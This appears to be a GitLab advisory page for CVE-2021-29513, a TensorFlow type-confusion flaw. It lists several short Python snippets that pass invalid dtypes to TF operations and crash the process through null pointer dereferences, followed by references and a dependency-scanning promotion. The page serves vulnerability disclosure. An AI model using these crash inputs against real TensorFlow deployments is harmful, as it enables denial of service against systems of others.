CVE-2021-29513: Type confusion during tensor casts lead to dereferencing null pointers
(updated )
Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences.
There are multiple ways to reproduce this, listing a few examples here:
import tensorflow as tf
import numpy as np
data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64)
import tensorflow as tf
import numpy as np
data =
tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20)
import tensorflow as tf
import numpy as np
data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20)
import tensorflow as tf
import numpy as np
data = tf.range(start=np.int32(214),limit=660,delta=129,dtype=20)
import tensorflow as tf
import numpy as np
data = tf.raw_ops.ResourceCountUpTo(resource=np.int32(30), limit=872, T=3)
import tensorflow as tf
import numpy as np
writer_array = np.array([1,2],dtype=np.int32)
writer_tensor = tf.convert_to_tensor(writer_array,dtype=tf.resource)
References
- github.com/advisories/GHSA-452g-f7fp-9jf7
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-441.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-639.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-150.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/030af767d357d1b4088c4a25c72cb3906abac489
- github.com/tensorflow/tensorflow/security/advisories/GHSA-452g-f7fp-9jf7
- nvd.nist.gov/vuln/detail/CVE-2021-29513
Code Behaviors & Features
Detect and mitigate CVE-2021-29513 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →